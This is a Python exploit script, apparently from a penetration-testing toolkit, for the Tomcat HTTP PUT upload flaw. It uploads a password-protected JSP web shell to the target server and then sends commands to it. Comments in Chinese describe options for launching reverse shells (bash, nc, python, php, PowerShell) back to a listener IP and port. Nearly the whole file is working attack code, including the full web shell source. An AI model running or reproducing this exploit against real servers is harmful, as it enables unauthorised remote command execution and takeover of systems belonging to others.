#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import sys
import base64

from json_parse import Jsonparse
from json_parse import Reverse_shell


class tomcat_put(object):

    def __init__(self, ip, port, level,cmd):
        self.ip=ip
        self.port = port
        self.level = level
        self.cmd = cmd
        self.url = 'http://'+str(self.ip)+':'+str(self.port)+ '/123.jsp/'
    
    def exec_command(self):
        url_cmd = 'http://'+str(self.ip)+':'+str(self.port)+ '/123.jsp?&pwd=023&cmd={}'.format(self.cmd)
        data='''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
        try:
            r1 = requests.put(url=self.url,data=data,timeout=self.level)
            r2 = requests.get(url=url_cmd,timeout=self.level)
            print r2.url
            print('<PRTINFOZHANG><' + base64.b64encode(r2.text) + '><PRTINFOZHANG>')
        except Exception as e:
            print(e)

if __name__ == '__main__':
    # 定义脚本参数接收
    # config.json:json文件的相对路径
    # ​	targetip：目标主机ip
    # ​	targetPort：目标主机端口
    # ​	反弹shell类型： 
    # ​		1——bash反弹
    # ​		2——nc反弹
    # ​		3——python反弹
    # ​		4——php反弹
    # ​		5——windows powershell反弹
    # ​		6——常规命令的执行接口
    # ​	listenIp——监听服务器ip
    # ​	listenPort——监听端口
    # ​	exec_cmd——用户可执行的shell命令，接口的形式，默认传一个值，否者会报错， 传入时一定要用引号引起来，不然空格会当成多个参数使用
    jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
    jsonobj = Jsonparse(jsonfile)
    jsondata = jsonobj.parse()
    targetIp = sys.argv[2]
    timeout = jsondata['timeout']
    targetPort = sys.argv[3]
    
    reverseType = sys.argv[4]
    listenIp = sys.argv[5]
    listenPort = sys.argv[6]
    exec_cmd = sys.argv[7]

    # 实例化反弹shell参数的对象
    reverse_shell = Reverse_shell(listenIp, listenPort, int(reverseType), exec_cmd)
    # 获取反弹shell的payload
    cmd = reverse_shell.select_type()
    # print(cmd)

    Scanner = tomcat_put(targetIp, int(targetPort), timeout, cmd)
    #判断reverseType类型是反弹shell，还是执行命令
    if int(reverseType) == 6:
        Scanner.exec_command()
    #else:
    #    Scanner.reverse_shell()